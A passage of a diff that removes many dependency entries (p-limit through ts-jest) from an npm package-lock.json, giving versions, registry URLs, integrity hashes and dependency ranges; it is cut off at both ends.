"sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "optional": true - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-domain": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-4.1.0.tgz", - "integrity": "sha512-zas79foMEsbMbIcJoPx26+NISWa3jTzZykOW9mXfRzvgadHvAHGd7qcCc1FbSWbD1I4qP71UWAxlTgu7Uq6IQg==", - "dependencies": { - "is-ip": "^3.1.0", - "node-fetch": "^2.6.1", - "punycode": "^2.1.1" - }, - "bin": { - "parse-domain-update": "bin/update.js" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/sshpk/node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stack-utils/node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tar/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" - }, - "node_modules/ts-jest": { - "version": "29.1.1", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.1.1.tgz", - "integrity": "sha512-D6xjnnbP17cC85nliwGiL+tpoKN0StpgE0TeOjXQTU6MVCfsB4v7aW05CgQ/1OywGb0x/oy9hHFnN+sczTiRaA==", - "dev": true, - "dependencies": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "^7.5.3", - "yargs-parser": "^21.0.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ts-jest/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/tslib": { - "version": "2.6.0", - "resolved": 